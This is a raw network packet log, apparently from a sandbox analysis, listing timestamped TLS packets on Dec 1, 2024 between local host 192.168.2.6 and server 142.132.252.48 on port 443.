                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.495002031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.495018959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.495095015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.495100975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.498682022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.500547886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.500562906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.500624895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.500632048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.502552986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.506285906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.506302118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.506369114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.506376982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.506393909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.506428003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.509782076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.511502981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.511522055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.511586905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.511594057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.514758110 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.517313004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.674484015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.674504042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.674618006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.674629927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.674745083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.680097103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.680114031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.680170059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.680186987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.680241108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.685568094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.685583115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.685616016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.685631990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.685642004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.685703993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.691437006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.691452980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.691512108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.691519022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.691545963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.691581011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.696398973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.696417093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.696481943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.696482897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.696491003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.698555946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.702064037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.702080011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.702142954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.702150106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.702708960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.702902079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.707648039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.707664967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.707775116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.707783937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.708364010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.708395958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.712611914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.712631941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.712712049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.712732077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.714581013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.716074944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.719717979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.875783920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.875804901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.876056910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.876068115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.876121044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.881196976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.881216049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.881279945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.881288052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.881304026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.881336927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.887100935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.887119055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.887178898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.887187958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.887204885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.887249947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.892755032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.892771959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.892847061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.892854929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.894592047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.897542953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.897561073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.897639036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.897650003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.898638964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.903264999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.903281927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.903318882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.903331995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.903404951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.903404951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.908879995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.908898115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.908994913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.909003019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.910582066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.911834955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.914602995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.914619923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.914711952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.914721012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.919015884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:01.919015884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.077358007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.077379942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.077435970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.077444077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.077527046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.082454920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.082473040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.082549095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.082561016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.082572937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.082642078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.088181019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.088205099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.088336945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.088346004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.088406086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.094006062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.094023943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.094109058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.094120979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.094235897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.098805904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.098824978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.098874092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.098988056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.098994970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.099056959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.104438066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.104455948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.104548931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.104564905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.104731083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.110089064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.110105038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.110181093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.110189915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.110239983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.114556074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.115906000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.115925074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.115989923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.116000891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.116013050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.116075993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.131581068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.278803110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.278831005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.278920889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.278930902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.279263973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.285175085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.285198927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.285284042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.285300970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.288566113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.289985895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.290004015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.290067911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.290075064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.291852951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.295068979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.295087099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.295166969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.295175076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.298621893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.300828934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.300849915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.301044941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.301054001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.302664042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.305793047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.305810928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.305900097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.305900097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.305908918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.305963039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.311403990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.311419964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.311502934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.311511040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.313718081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.317137957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.317153931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.317239046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.317245007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.318599939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.479896069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.479917049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.480035067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.480042934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.480109930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.485718012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.485735893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.485811949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.485819101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.485852003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.485874891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.490753889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.490771055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.490945101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.490952015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.491257906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.496314049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.496330976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.496411085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.496418953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.496505022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.502757072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.502774954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.502851963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.502851963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.502861977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.502938032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.507091045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.507107973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.507193089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.507200003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.507237911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.512819052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.512836933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.512911081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.512918949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.512964010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.518413067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.518430948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.518507004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.518527031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.518615961 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.681308031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.681329012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.681443930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.681457043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.681525946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.687097073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.687114000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.687185049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.687192917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.687274933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.692536116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.692553043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.692615986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.692634106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.692711115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.697618008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.697643042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.697782993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.697791100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.697971106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.703212023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.703237057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.703299046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.703305960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.703356028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.708873987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.708889961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.708996058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.709002018 CET44349721142.132.252.48192.168.2.6
